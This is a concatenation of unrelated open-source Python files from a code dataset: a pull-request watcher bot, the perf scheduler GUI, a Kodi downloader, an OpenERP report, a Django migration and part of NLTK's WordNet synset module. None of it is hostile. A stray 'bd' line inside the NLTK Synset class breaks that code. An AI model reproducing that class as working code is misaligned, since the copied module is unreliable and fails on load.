class PathWatcherNotifier(EventHandler):
'''Checks the paths in PR diff and notifies the watchers of those paths (if any).'''
def on_issue_open(self):
config = self.get_matched_subconfig()
if not (config and self.api.is_pull):
return
mentions = {}
for path in self.api.get_changed_files():
for user, watched in config.iteritems():
if user == self.api.creator: # don't mention the creator
continue
not_watched = filter(lambda p: p.startswith('-'), watched)
not_watched = map(lambda p: p.lstrip('-'), not_watched)
watched = filter(lambda p: not p.startswith('-'), watched)
for watched_path in watched:
if path.startswith(watched_path):
if any(path.startswith(p) for p in not_watched):
continue
mentions.setdefault(user, [])
mentions[user].append(path)
if not mentions:
return
message = [self.config['message_header']]
for watcher, files in mentions.items():
message.append(" * @{}: {}".format(watcher, ', '.join(files)))
self.api.post_comment('\n'.join(message))
handler = PathWatcherNotifier
| mpl-2.0 |
miiicmueller/android_kernel_raspberryPi_rpiv2 | tools/perf/scripts/python/Perf-Trace-Util/lib/Perf/Trace/SchedGui.py | 12980 | 5411 | # SchedGui.py - Python extension for perf script, basic GUI code for
# traces drawing and overview.
#
# Copyright (C) 2010 by Frederic Weisbecker <fweisbec@gmail.com>
#
# This software is distributed under the terms of the GNU General
# Public License ("GPL") version 2 as published by the Free Software
# Foundation.
try:
import wx
except ImportError:
raise ImportError, "You need to install the wxpython lib for this script"
class RootFrame(wx.Frame):
Y_OFFSET = 100
RECT_HEIGHT = 100
RECT_SPACE = 50
EVENT_MARKING_WIDTH = 5
def __init__(self, sched_tracer, title, parent = None, id = -1):
wx.Frame.__init__(self, parent, id, title)
(self.screen_width, self.screen_height) = wx.GetDisplaySize()
self.screen_width -= 10
self.screen_height -= 10
self.zoom = 0.5
self.scroll_scale = 20
self.sched_tracer = sched_tracer
self.sched_tracer.set_root_win(self)
(self.ts_start, self.ts_end) = sched_tracer.interval()
self.update_width_virtual()
self.nr_rects = sched_tracer.nr_rectangles() + 1
self.height_virtual = RootFrame.Y_OFFSET + (self.nr_rects * (RootFrame.RECT_HEIGHT + RootFrame.RECT_SPACE))
# whole window panel
self.panel = wx.Panel(self, size=(self.screen_width, self.screen_height))
# scrollable container
self.scroll = wx.ScrolledWindow(self.panel)
self.scroll.SetScrollbars(self.scroll_scale, self.scroll_scale, self.width_virtual / self.scroll_scale, self.height_virtual / self.scroll_scale)
self.scroll.EnableScrolling(True, True)
self.scroll.SetFocus()
# scrollable drawing area
self.scroll_panel = wx.Panel(self.scroll, size=(self.screen_width - 15, self.screen_height / 2))
self.scroll_panel.Bind(wx.EVT_PAINT, self.on_paint)
self.scroll_panel.Bind(wx.EVT_KEY_DOWN, self.on_key_press)
self.scroll_panel.Bind(wx.EVT_LEFT_DOWN, self.on_mouse_down)
self.scroll.Bind(wx.EVT_PAINT, self.on_paint)
self.scroll.Bind(wx.EVT_KEY_DOWN, self.on_key_press)
self.scroll.Bind(wx.EVT_LEFT_DOWN, self.on_mouse_down)
self.scroll.Fit()
self.Fit()
self.scroll_panel.SetDimensions(-1, -1, self.width_virtual, self.height_virtual, wx.SIZE_USE_EXISTING)
self.txt = None
self.Show(True)
def us_to_px(self, val):
return val / (10 ** 3) * self.zoom
def px_to_us(self, val):
return (val / self.zoom) * (10 ** 3)
def scroll_start(self):
(x, y) = self.scroll.GetViewStart()
return (x * self.scroll_scale, y * self.scroll_scale)
def scroll_start_us(self):
(x, y) = self.scroll_start()
return self.px_to_us(x)
def paint_rectangle_zone(self, nr, color, top_color, start, end):
offset_px = self.us_to_px(start - self.ts_start)
width_px = self.us_to_px(end - self.ts_start)
offset_py = RootFrame.Y_OFFSET + (nr * (RootFrame.RECT_HEIGHT + RootFrame.RECT_SPACE))
width_py = RootFrame.RECT_HEIGHT
dc = self.dc
if top_color is not None:
(r, g, b) = top_color
top_color = wx.Colour(r, g, b)
brush = wx.Brush(top_color, wx.SOLID)
dc.SetBrush(brush)
dc.DrawRectangle(offset_px, offset_py, width_px, RootFrame.EVENT_MARKING_WIDTH)
width_py -= RootFrame.EVENT_MARKING_WIDTH
offset_py += RootFrame.EVENT_MARKING_WIDTH
(r ,g, b) = color
color = wx.Colour(r, g, b)
brush = wx.Brush(color, wx.SOLID)
dc.SetBrush(brush)
dc.DrawRectangle(offset_px, offset_py, width_px, width_py)
def update_rectangles(self, dc, start, end):
start += self.ts_start
end += self.ts_start
self.sched_tracer.fill_zone(start, end)
def on_paint(self, event):
dc = wx.PaintDC(self.scroll_panel)
self.dc = dc
width = min(self.width_virtual, self.screen_width)
(x, y) = self.scroll_start()
start = self.px_to_us(x)
end = self.px_to_us(x + width)
self.update_rectangles(dc, start, end)
def rect_from_ypixel(self, y):
y -= RootFrame.Y_OFFSET
rect = y / (RootFrame.RECT_HEIGHT + RootFrame.RECT_SPACE)
height = y % (RootFrame.RECT_HEIGHT + RootFrame.RECT_SPACE)
if rect < 0 or rect > self.nr_rects - 1 or height > RootFrame.RECT_HEIGHT:
return -1
return rect
def update_summary(self, txt):
if self.txt:
self.txt.Destroy()
self.txt = wx.StaticText(self.panel, -1, txt, (0, (self.screen_height / 2) + 50))
def on_mouse_down(self, event):
(x, y) = event.GetPositionTuple()
rect = self.rect_from_ypixel(y)
if rect == -1:
return
t = self.px_to_us(x) + self.ts_start
self.sched_tracer.mouse_down(rect, t)
def update_width_virtual(self):
self.width_virtual = self.us_to_px(self.ts_end - self.ts_start)
def __zoom(self, x):
self.update_width_virtual()
(xpos, ypos) = self.scroll.GetViewStart()
xpos = self.us_to_px(x) / self.scroll_scale
self.scroll.SetScrollbars(self.scroll_scale, self.scroll_scale, self.width_virtual / self.scroll_scale, self.height_virtual / self.scroll_scale, xpos, ypos)
self.Refresh()
def zoom_in(self):
x = self.scroll_start_us()
self.zoom *= 2
self.__zoom(x)
def zoom_out(self):
x = self.scroll_start_us()
self.zoom /= 2
self.__zoom(x)
def on_key_press(self, event):
key = event.GetRawKeyCode()
if key == ord("+"):
self.zoom_in()
return
if key == ord("-"):
self.zoom_out()
return
key = event.GetKeyCode()
(x, y) = self.scroll.GetViewStart()
if key == wx.WXK_RIGHT:
self.scroll.Scroll(x + 1, y)
elif key == wx.WXK_LEFT:
self.scroll.Scroll(x - 1, y)
elif key == wx.WXK_DOWN:
self.scroll.Scroll(x, y + 1)
elif key == wx.WXK_UP:
self.scroll.Scroll(x, y - 1)
| gpl-2.0 |
koditraquinas/koditraquinas.repository | plugin.video.traquinas/resources/lib/libraries/simpledownloader.py | 22 | 7995 | '''
Simple XBMC Download Script
Copyright (C) 2013 Sean Poyser (seanpoyser@gmail.com)
This program is free software: you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation, either version 3 of the License, or
(at your option) any later version.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with this program. If not, see <http://www.gnu.org/licenses/>.
'''
import re
import json
import urllib
import urllib2
import urlparse
import xbmc
import xbmcgui
import xbmcplugin
import xbmcvfs
import os
import inspect
def download(name, image, url):
from resources.lib.libraries import control
if url == None:
return control.infoDialog(control.lang(30501).encode('utf-8'))
try: headers = dict(urlparse.parse_qsl(url.rsplit('|', 1)[1]))
except: headers = dict('')
url = url.split('|')[0]
content = re.compile('(.+?)\sS(\d*)E\d*$').findall(name)
transname = name.translate(None, '\/:*?"<>|').strip('.')
levels =['../../../..', '../../..', '../..', '..']
if len(content) == 0:
dest = control.setting('movie_downloads')
dest = control.transPath(dest)
for level in levels:
try: control.makeFile(os.path.abspath(os.path.join(dest, level)))
except: pass
control.makeFile(dest)
dest = os.path.join(dest, transname)
control.makeFile(dest)
else:
dest = control.setting('tv_downloads')
dest = control.transPath(dest)
for level in levels:
try: control.makeFile(os.path.abspath(os.path.join(dest, level)))
except: pass
control.makeFile(dest)
transtvshowtitle = content[0][0].translate(None, '\/:*?"<>|').strip('.')
dest = os.path.join(dest, transtvshowtitle)
control.makeFile(dest)
dest = os.path.join(dest, 'Season %01d' % int(content[0][1]))
control.makeFile(dest)
ext = os.path.splitext(urlparse.urlparse(url).path)[1][1:]
if not ext in ['mp4', 'mkv', 'flv', 'avi', 'mpg']: ext = 'mp4'
dest = os.path.join(dest, transname + '.' + ext)
sysheaders = urllib.quote_plus(json.dumps(headers))
sysurl = urllib.quote_plus(url)
systitle = urllib.quote_plus(name)
sysimage = urllib.quote_plus(image)
sysdest = urllib.quote_plus(dest)
script = inspect.getfile(inspect.currentframe())
cmd = 'RunScript(%s, %s, %s, %s, %s, %s)' % (script, sysurl, sysdest, systitle, sysimage, sysheaders)
xbmc.executebuiltin(cmd)
def getResponse(url, headers, size):
try:
if size > 0:
size = int(size)
headers['Range'] = 'bytes=%d-' % size
req = urllib2.Request(url, headers=headers)
resp = urllib2.urlopen(req, timeout=30)
return resp
except:
return None
def done(title, dest, downloaded):
playing = xbmc.Player().isPlaying()
text = xbmcgui.Window(10000).getProperty('GEN-DOWNLOADED')
if len(text) > 0:
text += '[CR]'
if downloaded:
text += '%s : %s' % (dest.rsplit(os.sep)[-1], '[COLOR forestgreen]Download succeeded[/COLOR]')
else:
text += '%s : %s' % (dest.rsplit(os.sep)[-1], '[COLOR red]Download failed[/COLOR]')
xbmcgui.Window(10000).setProperty('GEN-DOWNLOADED', text)
if (not downloaded) or (not playing):
xbmcgui.Dialog().ok(title, text)
xbmcgui.Window(10000).clearProperty('GEN-DOWNLOADED')
def doDownload(url, dest, title, image, headers):
headers = json.loads(urllib.unquote_plus(headers))
url = urllib.unquote_plus(url)
title = urllib.unquote_plus(title)
image = urllib.unquote_plus(image)
dest = urllib.unquote_plus(dest)
file = dest.rsplit(os.sep, 1)[-1]
resp = getResponse(url, headers, 0)
if not resp:
xbmcgui.Dialog().ok(title, dest, 'Download failed', 'No response from server')
return
try: content = int(resp.headers['Content-Length'])
except: content = 0
try: resumable = 'bytes' in resp.headers['Accept-Ranges'].lower()
except: resumable = False
#print "Download Header"
#print resp.headers
if resumable:
print "Download is resumable"
if content < 1:
xbmcgui.Dialog().ok(title, file, 'Unknown filesize', 'Unable to download')
return
size = 1024 * 1024
mb = content / (1024 * 1024)
if content < size:
size = content
total = 0
notify = 0
errors = 0
count = 0
resume = 0
sleep = 0
if xbmcgui.Dialog().yesno(title + ' - Confirm Download', file, 'Complete file is %dMB' % mb, 'Continue with download?', 'Confirm', 'Cancel') == 1:
return
print 'Download File Size : %dMB %s ' % (mb, dest)
#f = open(dest, mode='wb')
f = xbmcvfs.File(dest, 'w')
chunk = None
chunks = []
while True:
downloaded = total
for c in chunks:
downloaded += len(c)
percent = min(100 * downloaded / content, 100)
if percent >= notify:
xbmc.executebuiltin( "XBMC.Notification(%s,%s,%i,%s)" % ( title + ' - Download Progress - ' + str(percent)+'%', dest, 10000, image))
print 'Download percent : %s %s %dMB downloaded : %sMB File Size : %sMB' % (str(percent)+'%', dest, mb, downloaded / 1000000, content / 1000000)
notify += 10
chunk = None
error = False
try:
chunk = resp.read(size)
if not chunk:
if percent < 99:
error = True
else:
while len(chunks) > 0:
c = chunks.pop(0)
f.write(c)
del c
f.close()
print '%s download complete' % (dest)
return done(title, dest, True)
except Exception, e:
print str(e)
error = True
sleep = 10
errno = 0
if hasattr(e, 'errno'):
errno = e.errno
if errno == 10035: # 'A non-blocking socket operation could not be completed immediately'
pass
if errno == 10054: #'An existing connection was forcibly closed by the remote host'
errors = 10 #force resume
sleep = 30
if errno == 11001: # 'getaddrinfo failed'
errors = 10 #force resume
sleep = 30
if chunk:
errors = 0
chunks.append(chunk)
if len(chunks) > 5:
c = chunks.pop(0)
f.write(c)
total += len(c)
del c
if error:
errors += 1
count += 1
print '%d Error(s) whilst downloading %s' % (count, dest)
xbmc.sleep(sleep*1000)
if (resumable and errors > 0) or errors >= 10:
if (not resumable and resume >= 50) or resume >= 500:
#Give up!
print '%s download canceled - too many error whilst downloading' % (dest)
return done(title, dest, False)
resume += 1
errors = 0
if resumable:
chunks = []
#create new response
print 'Download resumed (%d) %s' % (resume, dest)
resp = getResponse(url, headers, total)
else:
#use existing response
pass
if __name__ == '__main__':
if 'simpledownloader.py' in sys.argv[0]:
doDownload(sys.argv[1], sys.argv[2], sys.argv[3], sys.argv[4], sys.argv[5])
| gpl-2.0 |
alanjw/GreenOpenERP-Win-X86 | openerp/addons/sale_crm/report/sales_crm_account_invoice_report.py | 103 | 1614 | # -*- coding: utf-8 -*-
##############################################################################
#
# OpenERP, Open Source Management Solution
# Copyright (C) 2004-2010 Tiny SPRL (<http://tiny.be>).
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
from openerp.osv import fields,osv
class account_invoice_report(osv.osv):
_inherit = 'account.invoice.report'
_columns = {
'section_id': fields.many2one('crm.case.section', 'Sales Team'),
}
def _select(self):
return super(account_invoice_report, self)._select() + ", sub.section_id as section_id"
def _sub_select(self):
return super(account_invoice_report, self)._sub_select() + ", ai.section_id as section_id"
def _group_by(self):
return super(account_invoice_report, self)._group_by() + ", ai.section_id"
# vim:expandtab:smartindent:tabstop=4:softtabstop=4:shiftwidth=4:
| agpl-3.0 |
hacklab-fi/hhlevents | hhlevents/apps/hhlregistrations/migrations/0003_auto_20150411_1919.py | 3 | 1300 | # -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import models, migrations
class Migration(migrations.Migration):
dependencies = [
('hhlregistrations', '0002_auto_20150411_1912'),
]
operations = [
migrations.AddField(
model_name='event',
name='close_registrations',
field=models.DateTimeField(null=True, blank=True),
),
migrations.AddField(
model_name='person',
name='banned',
field=models.DateTimeField(null=True, verbose_name='Automatically put to waiting list', blank=True),
),
migrations.AlterField(
model_name='person',
name='email',
field=models.EmailField(unique=True, max_length=254),
),
migrations.AlterField(
model_name='registration',
name='cancelled',
field=models.DateTimeField(null=True, blank=True),
),
migrations.AlterField(
model_name='registration',
name='state',
field=models.CharField(max_length=2, choices=[(b'AC', b'Assumed coming'), (b'CC', b'Confirmed coming'), (b'WL', b'Waiting-list'), (b'CA', b'Cancelled'), (b'WB', b'Waiting-list (due to ban)')]),
),
]
| bsd-3-clause |
DrDub/icsisumm | icsisumm-primary-sys34_v1/nltk/nltk-0.9.2/nltk/wordnet/synset.py | 9 | 25090 | # Natural Language Toolkit: Wordnet Interface: Wordnet Module
#
# Copyright (C) 2001-2008 University of Pennsylvania
# Author: Oliver Steele <steele@osteele.com>
# David Ormiston Smith <daosmith@csse.unimelb.edu.au>>
# Steven Bird <sb@csse.unimelb.edu.au>
# URL: <http://nltk.sf.net>
# For license information, see LICENSE.TXT
import math, pickle, string, re
from util import *
from similarity import *
from dictionary import *
from lexname import Lexname
from nltk import defaultdict
class Word(object):
def __init__(self, line):
"""
Extract a word from a line of a WordNet POS file.
@type line: C{string}
@param line: The appropriate line taken from the Wordnet data files.
"""
tokens = line.split()
ints = map(int, tokens[int(tokens[3]) + 4:])
self.form = tokens[0].replace('_', ' ') # orthography
self.pos = normalizePOS(tokens[1]) # NOUN, VERB, ADJECTIVE, ADVERB
self.taggedSenseCount = ints[1] # Number of senses tagged
self._synsetOffsets = ints[2:ints[0]+2] # Offsets of this word's synsets
def synsets(self):
"""
Get a sequence of the L{synsets}s of this word.
>>> from nltk.wordnet import *
>>> N['dog'].synsets()
[{noun: dog, domestic dog, Canis familiaris}, {noun: frump, dog}, {noun: dog}, {noun: cad, bounder, blackguard, dog, hound, heel}, {noun: frank, frankfurter, hotdog, hot dog, dog, wiener, wienerwurst, weenie}, {noun: pawl, detent, click, dog}, {noun: andiron, firedog, dog, dog-iron}]
@return: A list of this L{Word}'s L{Synsets}s
"""
try:
return self._synsets
except AttributeError:
self._synsets = [getSynset(self.pos, offset)
for offset in self._synsetOffsets]
del self._synsetOffsets
return self._synsets
def isTagged(self):
"""
>>> from nltk.wordnet import *
>>> N['dog'].isTagged()
True
@return: True/false (1/0) if one of this L{Word}'s senses is tagged.
"""
return self.taggedSenseCount > 0
# Broken
# def getAdjectivePositions(self):
# """
# >>> from nltk.wordnet import *
# >>> ADJ['clear'].getAdjectivePositions()
# [None, 'predicative']
#
# @return: Return a list of adjective positions that this word can
# appear in. These are elements of ADJECTIVE_POSITIONS.
# """
#
# return list(set(synset.position for synset in self))
def __getitem__(self, idx):
return self.synsets()[idx]
def __iter__(self):
return iter(self.synsets())
def __contains__(self, item):
return item in self.synsets()
def __getslice__(self, i, j):
return self.synsets()[i:j]
def __len__(self):
return len(self.synsets())
def __repr__(self):
# return "<Word:" + self.form + '/' + self.pos + ">"
return self.__str__()
def __str__(self):
return self.form + ' (' + self.pos + ")"
class Synset(object):
"""
A set of synonyms.
Each synset contains one or more Senses, which represent a
specific sense of a specific word. Senses can be retrieved via
synset.getSenses() or through the index notations synset[0],
synset[string], or synset[word]. Synsets also originate zero or
more typed pointers, which can be accessed via
synset.getPointers() or synset.getPointers(pointerType). The
targets of a synset pointer can be retrieved via
synset.getPointerTargets() or
synset.getPointerTargets(pointerType), which are equivalent to
map(Pointer.getTarget(), synset.getPointerTargets(...)).
>>> from nltk.wordnet import *
>>> V['think'][0].synset.verbFrames
(5, 9)
@type pos: C{string}
@param pos: The part of speech -- one of NOUN, VERB, ADJECTIVE, ADVERB.
@type offset: C{int}
@param offset: An integer offset into the part-of-speech file. Together
with pos, this can be used as a unique id.
@type gloss: C{string}
@param gloss: A gloss (dictionary definition) for the sense.
@type verbFrames: C{list} of C{integer}
@param verbFrames: A sequence of integers that index into
VERB_FRAME_STRINGS. These list the verb frames that any
Sense in this synset participates in. (See also
Sense.verbFrames.) Defined only for verbs.
"""
def __init__(self, pos, offset, line):
"""Initialize the Synset from a line in a WordNet synset file."""
# Part of speech -- one of NOUN, VERB, ADJECTIVE, ADVERB.
self.pos = pos
# Integer offset into the part-of-speech file. Together with pos,
# this can be used as a unique id.
self.offset = offset
# The synset entry can be broadly divided into two parts: the
# synset and relational data, and its human readable description, or
# gloss. The '|' character separates these.
dividerIndex = line.index('|')
tokens = line[:dividerIndex].split()
self.ssType = tokens[2]
self.gloss = line[dividerIndex + 1:].strip()
self.lexname = Lexname.lexnames[int(tokens[1])]
# TODO: This next code is dense and confusing. Clean up at some point.
# line is of the form:
# synset_offset lex_filenum ss_type w_cnt word lex_id [word lex_id...] p_cnt [ptr...] [frames...] | gloss
synset_cnt = int(tokens[3], 16) # hex integer representing number of items in the synset; same as w_cnt above
#extract all pairs of the form (sense, sense_index), plus a remainder
(senseTuples, remainder1) = _partition(tokens[4:], 2, synset_cnt)
self.words = [form for form, i in senseTuples]
#extract all pointer quadruples, plus a remainder
(self._pointerTuples, remainder2) = _partition(remainder1[1:], 4, int(remainder1[0]))
#frames: In data.verb only, a list of numbers corresponding to the
#generic verb sentence frames for word s in the synset. frames is of
#the form:
#f_cnt + f_num w_num [ + f_num w_num...]
#where f_cnt is a two digit decimal integer indicating the number of
#generic frames listed, f_num is a two digit decimal integer frame
#number, and w_num is a two digit hexadecimal integer indicating the
#word in the synset that the frame applies to. As with pointers, if
#this number is 00 , f_num applies to all word s in the synset. If
#non-zero, it is applicable only to the word indicated. Word numbers
#are assigned as described for pointers.
if pos == VERB:
(vfTuples, remainder3) = _partition(remainder2[1:], 3, int(remainder2[0]))
#now only used for senseVerbFrames
def extractVerbFrames(index, vfTuples):
return tuple(map(lambda t:int(t[1]), filter(lambda t,i=index:int(t[2],16) in (0, i), vfTuples)))
senseVerbFrames = []
for index in range(1, len(self.words) + 1):
senseVerbFrames.append(extractVerbFrames(index, vfTuples))
self._senseVerbFrames = senseVerbFrames
# A sequence of integers that index into VERB_FRAME_STRINGS. These
# list the verb frames that any Sense in this synset participates
# in (see also Sense.verbFrames). Defined only for verbs.
self.verbFrames = tuple(extractVerbFrames(None, vfTuples))
#A list of verb frame strings for this synset
self.verbFrameStrings = self.extractVerbFrameStrings(vfTuples)
def extractVerbFrameStrings(self, vfTuples):
"""
Return a list of verb frame strings for this synset.
"""
# extract a frame index if 3rd item is 00
frame_indices = [int(t[1], 16) for t in vfTuples if int(t[2], 16) == 0]
try:
verbFrames = [VERB_FRAME_STRINGS[i] for i in frame_indices]
except IndexError:
return []
#ideally we should build 3rd person morphology for this form
form = self[0]
verbFrameStrings = [vf % form for vf in verbFrames]
return verbFrameStrings
def relations(self):
"""
Return a dictionary of synsets
If pointerType is specified, only pointers of that type are
returned. In this case, pointerType should be an element of
POINTER_TYPES.
@return: relations defined on this L{Synset}.
"""
# Load the pointers from the Wordnet files if necessary.
if not hasattr(self, '_relations'):
relations = defaultdict(list)
for (type, offset, pos, indices) in self._pointerTuples:
rel = _RELATION_TABLE[type]
idx = int(indices, 16) & 255
pos = normalizePOS(pos)
offset = int(offset)
synset = getSynset(pos, offset)
if idx:
relations[rel].append(synset[idx-1])
else:
relations[rel].append(synset)
del self._pointerTuples
self._relations = dict(relations)
return self._relations
def relation(self, rel):
return self.relations().get(rel, [])
### BROKEN:
def isTagged(self):
"""
>>> from nltk.wordnet import *
>>> N['dog'][0].isTagged()
True
>>> N['dog'][1].isTagged()
False
@return: True/false (1/0) if one of this L{Word}'s senses is tagged.
"""
return len(filter(Word.isTagged, self.words)) > 0
def __str__(self):
"""
Return a human-readable representation.
>>> from nltk.wordnet import *
>>> str(N['dog'][0].synset)
'{noun: dog, domestic dog, Canis familiaris}'
"""
return "{" + self.pos + ": " + string.join(self.words, ", ") + "}"
def __repr__(self):
return "{" + self.pos + ": " + string.join(self.words, ", ") + "}"
def __cmp__(self, other):
return _compareInstances(self, other, ('pos', 'offset'))
def __eq__(self, other):
return _compareInstances(self, other, ('pos', 'offset')) == 0
def __ne__(self, other):
return not (self==other)
def __getitem__(self, idx):
try:
return self.words[idx] # integer key
except TypeError:
return self.relation(idx) # string key
def __iter__(self):
return iter(self.words)
def __contains__(self, item):
return item in self.words
def __getslice__(self, i, j):
return self.words[i:j]
def __nonzero__(self):
return 1
def __len__(self):
"""
>>> from nltk.wordnet import *
>>> len(N['dog'][0].synset)
3
"""
return len(self.words)
def max_depth(self):
"""
@return: The length of the longest hypernym path from this synset to the root.
"""
if self[HYPERNYM] == []:
return 0
deepest = 0
for hypernym in self[HYPERNYM]:
depth = hypernym.max_depth()
if depth > deepest:
deepest = depth
return deepest + 1
def min_depth(self):
"""
@return: The length of the shortest hypernym path from this synset to the root.
"""
if self[HYPERNYM] == []:
return 0
shallowest = 1000
for hypernym in self[HYPERNYM]:
depth = hypernym.max_depth()
if depth < shallowest:
shallowest = depth
return shallowest + 1
def closure(self, rel, depth=-1):
"""Return the transitive closure of source under the rel relationship, breadth-first
>>> dog = N['dog'][0]
>>> dog.closure(HYPERNYM)
[{noun: dog, domestic dog, Canis familiaris}, {noun: canine, canid}, {noun: carnivore}, {noun: placental, placental mammal, eutherian, eutherian mammal}, {noun: mammal, mammalian}, {noun: vertebrate, craniate}, {noun: chordate}, {noun: animal, animate being, beast, brute, creature, fauna}, {noun: organism, being}, {noun: living thing, animate thing}, {noun: object, physical object}, {noun: physical entity}, {noun: entity}]
"""
from nltk.utilities import breadth_first
synset_offsets = []
for synset in breadth_first(self, lambda s:s[rel], depth):
if synset.offset != self.offset and synset.offset not in synset_offsets:
synset_offsets.append(synset.offset)
yield synset
# return synsets
def hypernym_paths(self):
"""
Get the path(s) from this synset to the root, where each path is a
list of the synset nodes traversed on the way to the root.
@return: A list of lists, where each list gives the node sequence
connecting the initial L{Synset} node and a root node.
"""
paths = []
hypernyms = self[HYPERNYM]
if len(hypernyms) == 0:
paths = [[self]]
for hypernym in hypernyms:
for ancestor_list in hypernym.hypernym_paths():
ancestor_list.append(self)
paths.append(ancestor_list)
return paths
def hypernym_distances(self, distance, verbose=False):
"""
Get the path(s) from this synset to the root, counting the distance
of each node from the initial node on the way. A list of
(synset, distance) tuples is returned.
@type distance: C{int}
@param distance: the distance (number of edges) from this hypernym to
the original hypernym L{Synset} on which this method was called.
@return: A list of (L{Synset}, int) tuples where each L{Synset} is
a hypernym of the first L{Synset}.
"""
distances = set([(self, distance)])
for hypernym in self[HYPERNYM]:
distances |= hypernym.hypernym_distances(distance+1, verbose=False)
if verbose:
print "> Hypernym Distances:", self, string.join(synset.__str__() + ":" + `dist` for synset, dist in distances)
return distances
def shortest_path_distance(self, other):
"""
Returns the distance of the shortest path linking the two synsets (if
one exists). For each synset, all the ancestor nodes and their distances
are recorded and compared. The ancestor node common to both synsets that
can be reached with the minimum number of traversals is used. If no
ancestor nodes are common, -1 is returned. If a node is compared with
itself 0 is returned.
@type other: L{Synset}
@param other: The Synset to which the shortest path will be found.
@return: The number of edges in the shortest path connecting the two
nodes, or -1 if no path exists.
"""
if self == other: return 0
path_distance = -1
dist_list1 = self.hypernym_distances(0)
dist_dict1 = {}
dist_list2 = other.hypernym_distances(0)
dist_dict2 = {}
# Transform each distance list into a dictionary. In cases where
# there are duplicate nodes in the list (due to there being multiple
# paths to the root) the duplicate with the shortest distance from
# the original node is entered.
for (l, d) in [(dist_list1, dist_dict1), (dist_list2, dist_dict2)]:
for (key, value) in l:
if key in d:
if value < d[key]:
d[key] = value
else:
d[key] = value
# For each ancestor synset common to both subject synsets, find the
# connecting path length. Return the shortest of these.
for synset1 in dist_dict1.keys():
for synset2 in dist_dict2.keys():
if synset1 == synset2:
new_distance = dist_dict1[synset1] + dist_dict2[synset2]
if path_distance < 0 or new_distance < path_distance:
path_distance = new_distance
return path_distance
def information_content(self, freq_data):
"""
Get the Information Content value of this L{Synset}, using
the supplied dict 'freq_data'.
@type freq_data: C{dict}
@param freq_data: Dictionary mapping synset identifiers (offsets) to
a tuple containing the frequency count of the synset, and the
frequency count of the root synset.
@return: The IC value of this L{Synset}, or -1 if no IC value can be
computed.
"""
key = self.offset
if freq_data.has_key(key):
prob = float(freq_data[key][0]) / freq_data[key][1]
return -math.log(prob)
else: return -1
def tree(self, rel, depth=-1, cut_mark=None):
"""
>>> dog = N['dog'][0]
>>> from pprint import pprint
>>> pprint(dog.tree(HYPERNYM))
['dog' in {noun: dog, domestic dog, Canis familiaris},
[{noun: canine, canid},
[{noun: carnivore},
[{noun: placental, placental mammal, eutherian, eutherian mammal},
[{noun: mammal, mammalian},
[{noun: vertebrate, craniate},
[{noun: chordate},
[{noun: animal, animate being, beast, brute, creature, fauna},
[{noun: organism, being},
[{noun: living thing, animate thing},
[{noun: object, physical object},
[{noun: physical entity}, [{noun: entity}]]]]]]]]]]]]]
"""
tree = [self]
if depth != 0:
tree += [x.tree(rel, depth-1, cut_mark) for x in self[rel]]
elif cut_mark:
tree += [cut_mark]
return tree
# interface to similarity methods
def path_similarity(self, other, verbose=False):
return path_similarity(self, other, verbose)
def lch_similarity(self, other, verbose=False):
return lch_similarity(self, other, verbose)
def wup_similarity(self, other, verbose=False):
return wup_similarity(self, other, verbose)
def res_similarity(self, other, datafile="", verbose=False):
return res_similarity(self, other, datafile, verbose)
def jcn_similarity(self, other, datafile="", verbose=False):
return jcn_similarity(self, other, datafile, verbose)
bd
def lin_similarity(self, other, datafile="", verbose=False):
return lin_similarity(self, other, datafile, verbose)
# Utility functions
def _check_datafile(datafile):
if datafile is "":
raise RuntimeError, "You must supply the path of a datafile containing frequency information, as generated by brown_information_content() in 'brown_ic.py'"
def _load_ic_data(filename):
"""
Load in some precomputed frequency distribution data from a file. It is
expected that this data has been stored as two pickled dicts.
TODO: Possibly place the dicts into a global variable or something so
that they don't have to be repeatedly loaded from disk.
"""
infile = open(filename, "rb")
noun_freqs = pickle.load(infile)
verb_freqs = pickle.load(infile)
infile.close()
return (noun_freqs, verb_freqs)
# Lexical Relations
_RELATION_TABLE = {
'!': ANTONYM, '@': HYPERNYM, '~': HYPONYM, '=': ATTRIBUTE,
'^': ALSO_SEE, '*': ENTAILMENT, '>': CAUSE, '$': VERB_GROUP,
'#m': MEMBER_MERONYM, '#s': SUBSTANCE_MERONYM, '#p': PART_MERONYM,
'%m': MEMBER_HOLONYM, '%s': SUBSTANCE_HOLONYM, '%p': PART_HOLONYM,
'&': SIMILAR, '<': PARTICIPLE_OF, '\\': PERTAINYM, '+': FRAMES,
';c': CLASSIF_CATEGORY, ';u': CLASSIF_USAGE, ';r': CLASSIF_REGIONAL,
'-c': CLASS_CATEGORY, '-u': CLASS_USAGE, '-r': CLASS_REGIONAL,
'@i': INSTANCE_HYPERNYM,'~i': INSTANCE_HYPONYM,
}
# Private Utility Functions
def _index(key, sequence, testfn=None, keyfn=None):
"""
Return the index of key within sequence, using testfn for
comparison and transforming items of sequence by keyfn first.
>>> _index('e', 'hello')
1
>>> _index('E', 'hello', testfn=_equalsIgnoreCase)
1
>>> _index('x', 'hello')
"""
index = 0
for element in sequence:
value = element
if keyfn:
value = keyfn(value)
if (not testfn and value == key) or (testfn and testfn(value, key)):
return index
index = index + 1
return None
def _partition(sequence, size, count):
"""
Partition sequence into C{count} subsequences of
length C{size}, and a remainder.
Return C{(partitions, remainder)}, where C{partitions} is a sequence of
C{count} subsequences of cardinality C{size}, and
C{apply(append, partitions) + remainder == sequence}.
"""
partitions = []
for index in range(0, size * count, size):
partitions.append(sequence[index:index + size])
return (partitions, sequence[size * count:])
def _compareInstances(a, b, fields):
"""
Return -1, 0, or 1 according to a comparison first by type,
then by class, and finally by each of fields. Used when comparing two
Wordnet objects (Synsets, Words, or Senses) to each other.
"""
if not hasattr(b, '__class__'):
return cmp(type(a), type(b))
